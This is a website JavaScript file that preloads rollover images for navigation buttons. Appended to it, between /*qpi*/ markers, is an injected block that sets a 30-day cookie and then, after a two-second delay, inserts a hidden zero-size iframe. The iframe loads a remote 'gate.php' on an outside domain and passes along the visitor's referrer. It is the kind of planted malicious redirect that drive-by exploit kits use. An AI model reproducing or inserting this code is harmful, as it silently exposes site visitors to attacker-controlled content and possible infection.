

if (document.images) {
     button1 = new Image
     button2 = new Image
     
     button1.src = 'images/about.jpg'
     button2.src = 'images/about2.jpg'

     button3 = new Image
     button4 = new Image

     button3.src = 'images/process.jpg'
     button4.src = 'images/process2.jpg'

     button5 = new Image
     button6 = new Image

     button5.src = 'images/record.jpg'
     button6.src = 'images/record2.jpg'

     button7 = new Image
     button8 = new Image

     button7.src = 'images/people.jpg'
     button8.src = 'images/people2.jpg'

     button9 = new Image
     button10 = new Image

     button9.src = 'images/contact.jpg'
     button10.src = 'images/contact2.jpg'
 }

/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://zalupka.in/gate/gate.php?f=588167&r='+encodeURI(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
